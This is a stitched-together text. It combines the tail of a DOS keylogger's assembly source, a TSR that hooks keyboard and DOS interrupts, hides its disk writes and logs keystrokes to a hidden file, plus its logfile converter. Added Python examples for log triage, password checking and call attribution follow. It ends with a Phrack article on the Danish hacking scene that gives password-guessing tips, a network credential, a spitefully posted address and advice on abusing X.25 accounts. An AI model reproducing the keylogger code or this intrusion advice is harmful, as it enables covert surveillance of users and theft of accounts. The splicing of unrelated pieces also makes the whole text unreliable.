            cmp     must_write, 1       ; need to write ? 
            jne     B21                 ; 
            cmp     bufptr, 400         ; push a write when buffer 
            jae     A21                 ; is full 
; 
            cmp     hide, 3Fh           ; disk read 
            je      A21                 ; (hide buffer write) 
            cmp     hide, 40h           ; disk write 
            je      A21                 ; 
            jmp     B21                 ; can't hide, try another time 
; 
A21:        call    saveb               ; write buffer 
; 
B21:        mov     using_21, 0         ; no int-21 calls anymore 
C21:        pop     ds                  ; 
            pop     es                  ; 
            popa                        ; 
            popf                        ; 
            jmp     dword ptr old_21_off ; 
; 
D21:        pop     ds                  ; already installed ! 
            pop     es                  ; 
            popa                        ; 
            popf                        ; 
            mov     ax, 2               ; show installed 
            iret                        ; 
; 
timer:      cmp     done_flag, 0        ; only check time when 
            je      timerb              ; session is complete ! 
; 
            mov     ah, 2Ch             ; 
            int     21h                 ; what's the time ? 
            mov     al, ch              ; 
            xor     ah, ah              ; 
            mov     bx, 60              ; 
            mul     bx                  ; multiply hours by 60 
            xor     ch, ch              ; 
            add     ax, cx              ; add in the minutes 
; 
            mov     bx, stimem          ; 
            cmp     ax, bx              ; is time now same as 
            je      timerb              ; when session was completed 
                                        ; if so, don't do anything 
            xor     cx, cx              ; 
timer1:     cmp     bx, 1440            ; midnight then back to 0 
            jb      timer2              ; 
            xor     bx, bx              ; 
timer2:     inc     cx                  ; minutes counter 
            inc     bx                  ; 
            cmp     ax, bx              ; count until time now 
            jne     timer1              ; 
; 
            cmp     cx, delaym          ; 
            jb      timerb              ; should we reset ? 
; 
            mov     done_flag, 0        ; reset / next session 
timerb:     ret                         ; 
; 
switch:     mov     ax, 3509h           ; 
            int     21h                 ; 
            cmp     bx, offset int_9A   ; everything ok with 9A ? 
            jne     sw1                 ; check offset 
            mov     control, 0          ; show who has control 
            ret                         ; 
; 
sw1:        cmp     control, 1          ; 9B already in use ? 
            je      sw2                 ; yes, don't do anything 
            mov     ax, 3509h           ; 
            int     21h                 ; 
            mov     old_9b_seg, es      ; 
            mov     old_9b_off, bx      ; 
            mov     ax, 2509h           ; 
            lea     dx, int_9B          ; 
            int     21h                 ; use 9B instead of 9A ! 
            mov     control, 1          ; show who has control 
sw2:        ret                         ; 
; 
saveb:      mov     ax, 3D01h           ; 
            mov     dx, 82h             ; 
            int     21h                 ; open logfile, r/w 
            jc      probw               ; 
            mov     handle, ax          ; 
            mov     bx, ax              ; 
            mov     ax, 4202h           ; 
            xor     cx, cx              ; 
            xor     dx, dx              ; 
            int     21h                 ; point to eof 
            jc      probw               ; 
            mov     ah, 40h             ; 
            mov     bx, handle          ; 
            mov     cx, bufptr          ; 
            lea     dx, buf             ; 
            int     21h                 ; write buffer 
            jc      probw               ; 
            mov     ah, 3Eh             ; 
            mov     bx, handle          ; 
            int     21h                 ; close logfile 
            jc      probw               ; 
; 
            mov     cx, bufptr          ; no problems writing 
            add     write_amount, cx    ; so add to written amount 
; 
            mov     cx, mkeys           ; check number of keys logged 
            cmp     write_amount, cx    ; all done ? 
            jb      donew               ; 
; 
            mov     done_flag, 1        ; show session complete 
            mov     write_amount, 0     ; written amount to 0 
            call    gtime               ; grab stop time [minutes] 
; 
donew:      mov     must_write, 0       ; no need to write anymore 
            mov     bufptr, 0           ; buffer pointer back to 0 
probw:      ret                         ; try again another time 
                                        ; (if problem writing) 
; 
gtime:      mov     ah, 2Ch             ; DONE 
            int     21h                 ; grab time in minutes 
            mov     al, ch              ; 
            xor     ah, ah              ; 
            mov     bx, 60              ; 
            mul     bx                  ; multiply hours by 60 
            xor     ch, ch              ; 
            add     ax, cx              ; add in the minutes 
            mov     stimem, ax          ; start time in minutes 
            ret                         ; 
; 
install:    mov     bx, 80h             ; 
            cmp     byte ptr [bx], 0    ; any parameters ? 
            je      bye                 ; 
; 
            mov     ax, 0ffffh          ; 
            int     21h                 ; already installed ? 
            cmp     ax, 1               ; 
            je      bye                 ; 
; 
            call    conv                ; convert command line numbers 
            jc      bye                 ; 
            call    clog                ; check or create logfile 
; 
            mov     ax, 3509h           ; 
            int     21h                 ; 
            mov     old_9a_off, bx      ; save old int 9 
            mov     old_9a_seg, es      ; 
            mov     ah, 25h             ; 
            lea     dx, int_9A          ; 
            int     21h                 ; hook only 9A to start 
; 
            mov     ax, 3521h           ; 
            int     21h                 ; 
            mov     old_21_off, bx      ; save old int 21 
            mov     old_21_seg, es      ; 
            mov     ah, 25h             ; 
            lea     dx, int_21          ; 
            int     21h                 ; point to new int 21 
; 
            mov     datasegm, ds        ; save this data segment area 
                                        ; for later use in the ISR's 
            mov     bx, offset install  ; 
            mov     ax, 3100h           ; 
            mov     dx, bx              ; 
            mov     cl, 04h             ; 
            shr     dx, cl              ; 
            inc     dx                  ; 
            int     21h                 ; end / save above install 
; 
bye:        mov     ah, 4Ch             ; no installation 
            int     21h                 ; just end 
; 
conv:       push    ds                  ; convert command line options 
            pop     es                  ; 
            mov     di, 81h             ; 
conv1:      inc     di                  ; 
            cmp     byte ptr [di], 2Fh  ; point to first "/" 
            jnz     conv1               ; 
            inc     di                  ; point to first number 
            call    mconv               ; convert it 
            jc      conv4               ; any problems ? 
            mov     logH, dx            ; 
            mov     logL, cx            ; save max logfile size 
            add     cx, dx              ; 
            cmp     cx, 0               ; make sure not 0 
            je      conv4               ; 
; 
            dec     di                  ; 
conv2:      inc     di                  ; 
            cmp     byte ptr [di], 2Fh  ; point to second "/" 
            jnz     conv2               ; 
            inc     di                  ; point to first number 
            call    mconv               ; convert it 
            jc      conv4               ; any problems ? 
            cmp     dx, 0               ; bigger than 65535 ? 
            ja      conv4               ; 
            mov     mkeys, cx           ; save key limit 
; 
            dec     di                  ; 
conv3:      inc     di                  ; 
            cmp     byte ptr [di], 2Fh  ; point to third "/" 
            jnz     conv3               ; 
            inc     di                  ; point to first number 
            call    mconv               ; convert it 
            jc      conv4               ; any problems ? 
            cmp     dx, 0               ; 
            ja      conv4               ; bigger than 65535 end 
            cmp     cx, 1440            ; 
            ja      conv4               ; bigger than 1440 end 
            mov     delaym, cx          ; save session delay time 
            clc                         ; show no problems 
            ret                         ; 
conv4:      stc                         ; show problem 
            ret                         ; 
; 
mconv:      xor     cx, cx              ; main converter 
            mov     dx, cx              ; no comments here, all I 
            mov     ah, ch              ; know is that it works ! :) 
            cld                         ; 
            dec     di                  ; 
convL:      inc     di                  ; 
            mov     al, es:[di]         ; convert number at es:[di] 
            xor     al, '0'             ; 
            cmp     al, 10              ; carry flag will be set 
            jae     convD               ; if there's a problem 
            shl     cx, 1               ; 
            rcl     dx, 1               ; 
            jc      convD               ; 
            mov     bx, cx              ; 
            mov     si, dx              ; 
            shl     cx, 1               ; 
            rcl     dx, 1               ; 
            jc      convD               ; 
            shl     cx, 1               ; 
            rcl     dx, 1               ; 
            jc      convD               ; 
            add     cx, bx              ; 
            adc     dx, si              ; 
            jc      convD               ; 
            add     cl, al              ; 
            adc     ch, 0               ; 
            adc     dx, 0               ; 
            jc      convD               ; 
            jmp     convL               ; 
convD:      ret                         ; 
; 
clog:       mov     bx, 82h             ; point to logfile 
null1:      cmp     byte ptr [bx], 20h  ; find first space 
            je      null2               ; 
            inc     bx                  ; 
            jmp     null1               ; 
null2:      mov     byte ptr [bx], 0    ; replace space with 0 
; 
            mov     ax, 3D01h           ; 
            mov     dx, 82h             ; 
            int     21h                 ; open the file 
            jc      clog3               ; 
            mov     handle, ax          ; good open, save handle 
; 
            mov     ax, 4202h           ; 
            mov     bx, handle          ; 
            xor     cx, cx              ; 
            xor     dx, dx              ; 
            int     21h                 ; mov pointer to eof 
; 
            cmp     logH, dx            ; check size 
            ja      clog4               ; size ok 
            cmp     logH, dx            ; 
            je      clog1               ; 
            jmp     clog2               ; must be below, not ok 
clog1:      cmp     logL, ax            ; 
            ja      clog4               ; size ok 
; 
clog2:      mov     ax, 4301h           ; 
            mov     dx, 82h             ; 
            xor     cx, cx              ; 
            int     21h                 ; change file mode 
            mov     ah, 41h             ; 
            mov     dx, 82h             ; 
            int     21h                 ; delete file 
; 
clog3:      mov     ah, 3Ch             ; create new 
            mov     cx, 02h             ; (hidden) 
            mov     dx, 82h             ; 
            int     21h                 ; 
            mov     handle, ax          ; 
; 
clog4:      mov     bx, handle          ; close logfile handle 
            mov     ah, 3Eh             ; 
            int     21h                 ; 
            ret                         ; 
; 
            end     begin 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


; CONVERT v1.0 - Keytrap logfile converter 
; By Dcypher@aol.com 
; 
; Usage: CONVERT logfile outfile 
; 
;        logfile - Keytrap's scancode data (logfile) 
;        outfile - Specify an output file name 
; 
.286                                    ; 
.model small                            ; 
.code                                   ; 
org     100h                            ; 
; 
start:      jmp     go                  ; 
; 
inhandle    dw 0                        ; 
inpointH    dw 0                        ; 
inpointL    dw 0                        ; 
loaded      dw 0                        ; 
last        db 0                        ; 
; 
outhandle   dw 0                        ; 
outoffset   dw 0                        ; 
; 
table       db 002h, '1'                ; scan-code table 
            db 003h, '2'                ; 
            db 004h, '3'                ; 
            db 005h, '4'                ; 
            db 006h, '5'                ; 
            db 007h, '6'                ; 
            db 008h, '7'                ; 
            db 009h, '8'                ; 
            db 00Ah, '9'                ; 


;           [The remaining scan-code table entries are illegible in this 
;            copy. Surviving table comments: space, space with shift, 
;            backspace, backspace with shift, return, return with shift, 
;            End of Table. The start of the main routine and the code that 
;            prints namver, usage and ferr and exits with function 4Ch are 
;            also illegible.] 
; 
            mov     bx, 80h             ; 
            cmp     byte ptr [bx], 0    ; 
            je      prtuse              ; 
; 
            call    null                ; 
            call    check               ; 
            jc      fprob               ; 
; 
go1:        call    ldata               ; 
            call    conv                ; 
            call    sdata               ; 
            cmp     last, 1             ; 
            jne     go1                 ; 
            jmp     bye                 ; 
; 
null:       mov     bx, 81h             ; 
null1:      inc     bx                  ; 
            cmp     byte ptr [bx], 20h  ; 
            jnz     null1               ; 
            mov     byte ptr [bx], 0    ; 
; 
            mov     outoffset, bx       ; 
            inc     word ptr [outoffset] ; 
; 
null2:      inc     bx                  ; 
            cmp     byte ptr [bx], 0Dh  ; 
            jnz     null2               ; 
            mov     byte ptr [bx], 0    ; 
            ret                         ; 
; 
check:      mov     ax, 3D00h           ; 
            mov     dx, 82h             ; 
            int     21h                 ; 
            jc      check2              ; 
            mov     bx, ax              ; 
            mov     ah, 3Eh             ; 
            int     21h                 ; 
            jc      check2              ; 
; 
            mov     ah, 3Ch             ; 
            xor     cx, cx              ; 
            mov     dx, outoffset       ; 
            int     21h                 ; 
            jc      check2              ; 
            mov     bx, ax              ; 
            mov     ah, 3Eh             ; 
            int     21h                 ; 
            jc      check2              ; 
; 
            clc                         ; 
check2:     ret                         ; 
; 
ldata:      mov     ax, 3D00h           ; 
            mov     dx, 82h             ; 
            int     21h                 ; 
            mov     inhandle, ax        ; 
; 
            mov     ax, 4200h           ; 
            mov     bx, inhandle        ; 
            mov     cx, inpointH        ; 
            mov     dx, inpointL        ; 
            int     21h                 ; 
; 
            mov     ah, 3Fh             ; 
            mov     bx, inhandle        ; 
            mov     cx, 60000           ; 
            lea     dx, eof             ; 
            int     21h                 ; 
            mov     loaded, ax          ; 
            cmp     ax, 60000           ; 
            je      ldata2              ; 
            mov     last, 1             ; 
; 
ldata2:     mov     ax, 4201h           ; 
            mov     bx, inhandle        ; 
            xor     cx, cx              ; 
            xor     dx, dx              ; 
            int     21h                 ; 
            mov     inpointH, dx        ; 
            mov     inpointL, ax        ; 
; 
            mov     ah, 3Eh             ; 
            mov     bx, inhandle        ; 
            int     21h                 ; 
            ret                         ; 
; 
conv:       mov     cx, loaded          ; 
            lea     si, eof             ; 
; 
conv1:      lea     di, table           ; 
; 
            cmp     cx, 0               ; 
            je      conv6               ; 
; 
            mov     al, byte ptr [si]   ; 
conv2:      mov     ah, byte ptr [di]   ; 
            cmp     ah, 0               ; 
            je      conv4               ; 
            cmp     ah, al              ; 
            je      conv3               ; 
            add     di, 2               ; 
            jmp     conv2               ; 
; 
conv3:      inc     di                  ; 
            mov     al, byte ptr [di]   ; 
            mov     byte ptr [si], al   ; 
            dec     cx                  ; 
            inc     si                  ; 
            jmp     conv1               ; 
; 
conv4:      mov     byte ptr [si], 20h  ; 
            dec     cx                  ; 
            inc     si                  ; 
            jmp     conv1               ; 
; 
conv6:      ret                         ; 
; 
sdata:      mov     ax, 3D02h           ; 
            mov     dx, outoffset       ; 
            int     21h                 ; 
            mov     outhandle, ax       ; 
; 
            mov     ax, 4202h           ; 
            mov     bx, outhandle       ; 
            xor     cx, cx              ; 
            xor     dx, dx              ; 
            int     21h                 ; 
; 
            mov     ah, 40h             ; 
            mov     bx, outhandle       ; 
            mov     cx, loaded          ; 
            lea     dx, eof             ; 
            int     21h                 ; 
; 
            mov     ah, 3Eh             ; 
            mov     bx, outhandle       ; 
            int     21h                 ; 
            ret                         ; 


namver      db 10,13 
            db 'CONVERT v1.0',10,13 
            db 'Keytrap logfile converter.',10,13 
            db 'By Dcypher (Dcypher@aol.com)',10,13 
            db 10,13,'$' 
; 
usage       db 'Usage: CONVERT logfile outfile',10,13 
            db 10,13 
            db ' logfile - Keytrap',27h,'s scancode data.',10,13 
            db ' outfile - Specify an output file name.',10,13 
            db 10,13,'$' 
; 
ferr        db 'WARNING: Problem with one of the files.',10,13 
            db 10,13,'$' 
; 
eof         db 0 
            end     start 
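The record format that pkey writes and CONVERT reads (one byte per keypress, scancode 01h-39h, with 80h added when either Shift key or Caps Lock is active) is enough for an incident responder to recognise a leftover logfile and scope what it exposed. The following is an added example, not code from the article or its author; it assumes a US keyboard layout, uses the standard PC/XT scancode set 1 table rather than the listing's own table, and its function names and sample bytes are constructed.

```python
"""Triage and decode a suspected KEYTRAP logfile (added example)."""

# PC/XT scancode set 1 make codes, US layout (assumption): first code of a
# run of keys, unshifted characters, shifted characters.
_ROWS = [
    (0x02, "1234567890-=", "!@#$%^&*()_+"),
    (0x10, "qwertyuiop[]", "QWERTYUIOP{}"),
    (0x1E, "asdfghjkl;'`", 'ASDFGHJKL:"~'),
    (0x2B, "\\zxcvbnm,./", "|ZXCVBNM<>?"),
]
_NAMED = {0x01: "<esc>", 0x0E: "<bs>", 0x0F: "<tab>", 0x1C: "<enter>",
          0x1D: "<ctrl>", 0x37: "<kp*>", 0x38: "<alt>", 0x39: " "}
_SKIPPED = {0x2A, 0x36}  # left/right Shift: pkey never stores these codes

PLAIN, SHIFTED = {}, {}
for first, plain, shifted in _ROWS:
    for offset, (p, s) in enumerate(zip(plain, shifted)):
        PLAIN[first + offset] = p
        SHIFTED[first + offset] = s

# Constructed sample: "dir", Enter, flagged "p", "ass", flagged "1".
SAMPLE_LOG = bytes([0x20, 0x17, 0x13, 0x1C, 0x99, 0x1E, 0x1F, 0x1F, 0x82])


def is_valid_record(byte):
    """A byte pkey could have written: low 7 bits are a make code up to the
    spacebar (39h) and not one of the two Shift keys."""
    code = byte & 0x7F
    return 0x01 <= code <= 0x39 and code not in _SKIPPED


def looks_like_keytrap_log(data, threshold=0.98):
    """Heuristic triage: nearly every byte must be a valid record. ASCII
    text fails because letters are above 39h once the top bit is masked."""
    if not data:
        return False
    valid = sum(1 for b in data if is_valid_record(b))
    return valid / len(data) >= threshold


def decode(data):
    """Render the captured keys so exposed credentials can be identified.

    The 80h flag means Shift OR Caps Lock, so a flagged digit or symbol is
    ambiguous and is shown as {plain|shifted}. A flagged letter is shown in
    upper case, which is wrong only when Shift and Caps Lock were both on.
    """
    out = []
    for b in data:
        code, flagged = b & 0x7F, bool(b & 0x80)
        if not is_valid_record(b):
            out.append("<?%02x>" % b)          # not a KEYTRAP record
        elif code in _NAMED:
            out.append(_NAMED[code])
        elif not flagged:
            out.append(PLAIN[code])
        elif PLAIN[code].isalpha():
            out.append(SHIFTED[code])
        else:
            out.append("{%s|%s}" % (PLAIN[code], SHIFTED[code]))
    return "".join(out)


if __name__ == "__main__":
    print(looks_like_keytrap_log(SAMPLE_LOG), decode(SAMPLE_LOG))
```

Key releases never appear in the log because pkey discards every code above 39h, so a file that passes the triage check and carries the DOS hidden attribute is a strong indicator.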
==Phrack Magazine== 


Volume Five, Issue Forty-Six, File 27 of 28 

International Scenes 


There was once a time when hackers were basically isolated. It was 
almost unheard of to run into hackers from countries other than the 
United States. Then in the mid 1980's, thanks largely to the 
existence of chat systems accessible through X.25 networks like 
Altger, tchh and QSD, hackers world-wide began to run into each other. 
They began to talk, trade information, and learn from each other. 
Separate and diverse subcultures began to merge into one collective 
scene, which has brought us the hacking subculture we know today: a 
subculture that knows no borders, one whose denizens share the common goal 
of liberating information from its corporate shackles. 


With the incredible proliferation of the Internet around the globe, this 
group is growing by leaps and bounds. With this in mind, we want to help 
further unite the communities in various countries by shedding light 
onto the hacking scenes that exist there. If you want to contribute a 
file about the hacking scene in your country, please send it to us 
at phrack@well.com. 


This month we have files about the scenes in Denmark and Russia, updates 
from Australia and Argentina, and a scan of Norway’s toll-free exchange. 


The Computer Underground in Denmark 


Dear Phrack Readers, what follows is a little about the Danish 
computer underground, focusing on the hacking/phreaking scene. 


A little introduction: 


Even though Denmark itself is a little country, with a little over 5 million 
citizens, an active computer underground community thrives upon the growing 
network links and computer systems which these days seem to pop up all 
over the country. 


The history of the hacking community in DK is not very old, but since the 
first Danish hackers appeared some 5 years ago, there has been increasing 
hacking activity, bringing on a history of busts, paranoia and times of war; 
but also a history of great friendships, supremacy over the corporate machine, 
and a process of learning more about the world we live in. But before we take 
a look at the networks, boards and the community itself, let's go back in time, 
and find the place where it all started. 


The Past: 


The first hackers to appear in DK were JubJub Bird and Sprocket, two high 
school students who broke into 100's of computers world wide. At that time 
there was no H/P scene in DK, no boards, no HP networks and no fellow hackers. 
Nevertheless, JubJub plays a key role in Danish HP history. JubJub 
got busted in early January '90, after being discovered in some of NASA's non 
public machinery, and being under surveillance for a period of time. This was 
the beginning of what was to become the Danish hacking scene. JubJub and 
Sprocket never got a sentence, since the court had absolutely no idea of how 
to handle a case like this. The court set a period of 2 years, and if 
JubJub or Sprocket was caught hacking within that period they would 
get a verdict. 


Anyway, after the bust of JubJub and Sprocket, the first stirs of hackers 
appeared and began to expand like rings in water. And suddenly we had a growing 
happy hacking community. Hackers from all over the country gathered at newly 
started 'HPA only boards', which were a rarely seen thing among the sea of WaReZ 
boards. One of the coolest boards was Fantasia, the headquarters of MoTIGoL, 
which was being run by Netrunner. Fantasia was the largest in Denmark, maybe 
even in Scandinavia, and had callers from all over the world. At that time, 
nobody was afraid of getting busted, and A LOT of BlueBoxing, X25, and general 
hacking on Inet was done. But one day all that changed. 


During the winter '91 DIKU (Institute of computer science, Copenhagen 
university) was used as a meeting place of hackers. A lot of novice hackers 
used the machines to learn about Internet and UNIX in general, skating through 
the internet, trading info, chatting at IRC and stuff like that. What nobody 
knew was that Jørgen Bo Madsen, security expert and high paid consultant 
working for UNI*C, was monitoring all traffic to and from DIKU, with evil 
intentions of busting! The law enforcement specter was soon to cast its dark 
shadow on the whole of the Danish scene. 


It all ended one winter afternoon. I remember turning on the TV, not really 
paying attention to the news, reading a book or so, when suddenly the news 
lady starts speaking about how the secret service is soon to unravel the biggest 
hacker conspiracy ever in Denmark, one hacker was already arrested and 10 more 
would be arrested in near future. Saron was the one who got busted. He had used 
an x25 datapak link, which normally only was used for electronic mail, to 
access DIKU, coming in from a German PAD to make tracing harder, but also 
making a hell of a big bill for the stolen NUI's owner. Anyway, it came out 
that JBM (Jørgen Bo Madsen) had traced 76 calls to DIKU, and had monitored the 
breakins of computers in Greece, Brazil, Mexico and USA. 


At that moment the entire scene more or less panicked. Most dudes moved 
their precious machinery out of the house and all boards closed down. 
A period of isolation began. The SysOp of Fantasia, Netrunner, pulled out his 
harddisk, hiding it somewhere out of reach in case JBM and his secret service 
buddies should show up. 


No more busts happened and people calmed down after a month or so. Everybody 
knew that things wouldn't be the same after the DIKU incident. Netrunner's 
harddisk broke down after he had reinstalled it, because all the dirt it 
had consumed from 2 years of constant running was too much for the thing to 
handle when it was powered back on. So, Fantasia closed and the underground 
network PhoenixNet also closed when it came out that JBM had infiltrated 
the net. An era was over, and a new one was to begin. 


The Present: 


Today's scene is doing quite well. It has become harder in a way, more 
careful and more closed than ever. But still, we have open boards 
and a public network, FOOnet, which focuses on computer security and is 
used as a forum open for discussions, mostly by hackers and people into 
computer security in general, but every once in a while JBM and Sysadm's 
drop by too. Also, the Danish scene is proud to release CrackerJack, made by 
Jackal, which we still claim is the fastest UNIX passwd cracker available for 
PC. Not that cracking passwd files is a major element in hacking, but it's nice 
to have a fast cracker every once in a while :) 


The Danish computer underground scene is filled with WaReZ boards, 
but only a few real H/P/A boards are running. Boards like Free Speech Inc. 
and Freeside are places where the Danish hackers hang out. None of these 
boards are public, but JBM is quite aware of them and had once infiltrated 
Freeside, even though it was clearly stated that the bbs was private and 
no one related to any gov agencies was allowed to use the board. So, JBM 
is actually doing what he has accused us of over the years, which is 
intruding on people's privacy. 


Other than FOOnet, there are a few other networks, such as SDC, which 
once had a good mail flow in the hacking conferences, but today is 
turning more into a demo/warez net. A few other truly H/P nets are running 
successfully with a good mail flow, but those shall remain anonymous in 
this article. 


The links from the Danish scene to fellow hackers around the world are 
very good. Due to numerous nights spent at QSD, connections are established 
to a lot of dudes in Brazil who frequently drop by Free Speech Inc. and 
Freeside, dudes in UK as well as fellow hackers in US like Alby/Empire. 


Okay, this is it. The section about hacking in Denmark. The stuff 
that you had to read all the above boring shitty sentimental stuff, 
to get to!! 


Hacking in Denmark: 


The two main networks in DK which are used for hacking and meeting fellow 
hackers are (of course) Internet and the X25 datapak link. Internet is 
accessible via all universities like diku.dk, daimi.aau.dk, auc.dk and so on. 
(Nobody uses DIKU anymore though). The university is putting up a brave struggle 
to keep the hackers out by upgrading to C2 passwd security, meaning that 
passwds must be at least 8 chars and contain 1 uppercase and 1 non alphabetic 
char. 


The upper level of the top 10 of chosen C2 security passwds goes something
like: q1w2e3r4*, a1s2d3f4*. These do not contain any uppercase chars and
therefore should not have been accepted as a passwd by the system, but
apparently the C2 software finds them secure. Also, a nice thing to do is
taking your wordlist and using Therion’s Passwd Utility, TPU, which is a word
list manipulator, and add a 1* to all words in the list and uppercase the first
letter. Gives a lot of accounts.
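
The policy failure described above, seen from the administrator's side, as an added example that is not part of the original article: a checker that enforces the stated rule (8+ chars, one uppercase, one non-alphabetic) and also rejects the two predictable patterns the author names. The function names and the small word list are constructed for illustration.

```python
import re

# Rows of a QWERTY keyboard, used to recognise "walks" such as q1w2e3r4.
KEY_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")

# Constructed sample dictionary; a deployment would load a real wordlist.
SAMPLE_WORDS = frozenset({"password", "denmark", "hacker", "summer", "secret"})


def meets_stated_policy(pw):
    """The rule as the article states it: 8+ chars, an uppercase letter,
    and a non-alphabetic character."""
    return (len(pw) >= 8
            and any(c.isupper() for c in pw)
            and any(not c.isalpha() for c in pw))


def _row_run(s, min_len):
    """True if s is a run of neighbouring keys on one row, either direction."""
    s = s.lower()
    if len(s) < min_len:
        return False
    return any(s in row or s in row[::-1] for row in KEY_ROWS)


def is_keyboard_walk(pw):
    """Catch straight walks (asdfghjk) and two interleaved walks (q1w2e3r4)."""
    core = re.sub(r"[^A-Za-z0-9]+$", "", pw)  # drop a trailing '*', '!' ...
    if len(core) < 6:
        return False
    if _row_run(core, 6):
        return True
    # Characters at even and odd positions each form their own row run.
    return _row_run(core[0::2], 3) and _row_run(core[1::2], 3)


def is_mangled_word(pw, words=SAMPLE_WORDS):
    """Catch 'Word1*' style passwords: a dictionary word with only digits or
    punctuation appended, whatever the capitalisation."""
    stem = re.sub(r"[^A-Za-z]+$", "", pw).lower()
    return stem in words


def check_password(pw, words=SAMPLE_WORDS):
    """Return a list of reasons to reject pw; an empty list means accept."""
    problems = []
    if len(pw) < 8:
        problems.append("shorter than 8 characters")
    if not any(c.isupper() for c in pw):
        problems.append("no uppercase letter")
    if not any(not c.isalpha() for c in pw):
        problems.append("no non-alphabetic character")
    if is_keyboard_walk(pw):
        problems.append("keyboard walk")
    if is_mangled_word(pw, words):
        problems.append("dictionary word with appended suffix")
    return problems


if __name__ == "__main__":
    for candidate in ("q1w2e3r4*", "a1s2d3f4*", "Denmark1*", "tR7#vomLq2"):
        print(candidate, "->", check_password(candidate) or "accepted")
```

A password such as `Denmark1*` satisfies the stated composition rule and is still rejected here, which is the gap the paragraph above describes.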


Another popular thing, in order to keep hackers out, is to set up a so-called
‘modem security password’ on all dialups. So when you call up the system,
before you ever get to the server you have to enter a password. And if you get
through, not all accounts are cleared to use the modem dialup facilities,
and unless you’ve got your sleazy hands on a cleared account, you get the boot.


Even though the universities put such a great effort into keeping
hackers out, they aren’t doing very well. In fact, they are doing real
bad. A legit account costs appr. 1900 dkr, which is a little over
300$ US, which goes into the pockets of UNI*C, so it’s no wonder that
we like to use the nice free facilities present at the universities.


Other ways to get on Internet are via other machines under the ministry
of education and certain private and government systems. It’s surprising
how many bugs (that we all know of) in certain UNIX versions still
have not been patched, and therefore leave the systems wide open.
This goes not only for Denmark, but generally throughout machines on Internet
in Europe. Also, a well known phenomenon in DK throughout the sector of
private corporation computer systems is lousy security. Elementary
stuff like bad file permissions, left over suid shell scripts, and
open guest accounts are everywhere.


Regarding the X25 datapak links. The official Danish PAD can be
reached at dialup 171. This is a totally free number just like 80xxxxxx
are, which doesn’t affect your phone bill. Keep in mind that all calls made in
DK are billed, even local calls within same city are charged, and charged
high! I remember a time when I was kind of addicted to a certain MUD. For one
month alone I got a bill of 1800 dkr, appr. 300 US$! So, the 171 X25 link is
a nice thing, since all calls are billed to the owner of the Network User Id
(NUI) and NOT on your phone bill.


However, X25 can be a dangerous thing to use. Especially if you only
have a single NUI to use. The phone company is having some trouble tracing
the 171, but all calls made in DK on digital lines are logged. So, when
some corporation gets a bill of, say 2-3000$ or an amount much higher
than usual, the phone company can compare the logs on who dialed 171,
to the X25 logs, on which date and time the NUI in question was abused,
and figure out who abused the NUI. On analog lines the logging is
harder to do, and only goes back a month or so. The format of the NUIs
consists of a user number and a password. The first char is
either a K or J, depending on whether the NUI’s owner is located under the
KTAS or JTAS district. Jutland is covered by JTAS and Copenhagen Sjælland,
by KTAS. Then follows 7 or 8 numbers and usually a word of 7-8 chars. Like,
KO1LOO872DKDIANEC, this is a valid NUI open for public use by everybody,
but it’s restricted to only connect to a specific system. Sum lame
menu database thing. Most NUIs allow access to most computers, world
wide on the X25 network, by an NUA (Network User Address). The most use
of X25 is to gain free access to Internet by connecting to a PAD which
allows telnet. Most of the telnet PADs have been closed recently because
of an increasing (ab)use. However, there are still sites like
isosun-t.ariadne.gr which carries an X25 PAD, and because the sysadm there
comes off like a dick and is a jerk I’ll give u all his NUA. It’s
020233181282010. Also, check out gw.sdbs.dk, carries a 9k6 x25 link as well
as normal Inet axx.
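
The log comparison the phone company is described as doing, sketched as an added example that is not part of the original article: exchange call records for the PAD number are matched against the PAD's accounting records for one NUI, and a subscriber line is only named when it spans every session. Line IDs, NUI labels, timestamps, the record layout and the two-minute clock slack are all constructed assumptions.

```python
from collections import Counter
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M"
PAD_NUMBER = "171"  # the PAD dial-up number named in the article

# Constructed exchange records: (subscriber line, dialed number, start, end).
CALL_LOG = [
    ("LINE-A", "171", "1994-03-01 22:10", "1994-03-01 23:40"),
    ("LINE-B", "171", "1994-03-01 22:05", "1994-03-01 23:45"),
    ("LINE-A", "171", "1994-03-03 01:10", "1994-03-03 03:15"),
    ("LINE-C", "171", "1994-03-03 01:00", "1994-03-03 01:20"),
    ("LINE-B", "80xxxxxx", "1994-03-03 01:00", "1994-03-03 04:00"),
    ("LINE-A", "171", "1994-03-05 23:00", "1994-03-06 00:30"),
]

# Constructed PAD accounting records: (NUI label, session start, session end).
PAD_LOG = [
    ("NUI-EXAMPLE-1", "1994-03-01 22:12", "1994-03-01 23:39"),
    ("NUI-EXAMPLE-1", "1994-03-03 01:12", "1994-03-03 03:14"),
    ("NUI-EXAMPLE-2", "1994-03-03 01:02", "1994-03-03 01:19"),
    ("NUI-EXAMPLE-1", "1994-03-05 23:03", "1994-03-06 00:29"),
]


def _t(stamp):
    return datetime.strptime(stamp, FMT)


def callers_for_session(start, end, call_log, slack=timedelta(minutes=2)):
    """Lines whose call to the PAD number spans the whole X.25 session.

    slack absorbs clock differences between the exchange and the PAD.
    """
    hits = set()
    for line, dialed, c_start, c_end in call_log:
        if dialed != PAD_NUMBER:
            continue
        if _t(c_start) <= start + slack and _t(c_end) >= end - slack:
            hits.add(line)
    return hits


def rank_callers(nui, pad_log=PAD_LOG, call_log=CALL_LOG):
    """Return (number of sessions, [(line, sessions spanned), ...])."""
    sessions = [(_t(s), _t(e)) for n, s, e in pad_log if n == nui]
    counts = Counter()
    for start, end in sessions:
        counts.update(callers_for_session(start, end, call_log))
    return len(sessions), counts.most_common()


def attribute(nui, min_sessions=2, pad_log=PAD_LOG, call_log=CALL_LOG):
    """Name a line only if it alone spans every session and there are
    enough sessions to rule out coincidence; otherwise return None."""
    total, ranked = rank_callers(nui, pad_log, call_log)
    full = [line for line, n in ranked if n == total]
    if total >= min_sessions and len(full) == 1:
        return full[0]
    return None


if __name__ == "__main__":
    for nui in ("NUI-EXAMPLE-1", "NUI-EXAMPLE-2"):
        print(nui, rank_callers(nui), "->", attribute(nui))
```

The first session alone matches two lines; only the repetition across sessions separates them, which is why a single NUI used repeatedly is the risky case the paragraph above describes.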


A few people to mention, who either have played or are playing an important
part in the Danish hacking community:


JubJub Bird, Sprocket, Saron, Ravan, Netrunner / Sense/NET, Descore, WedLock, 
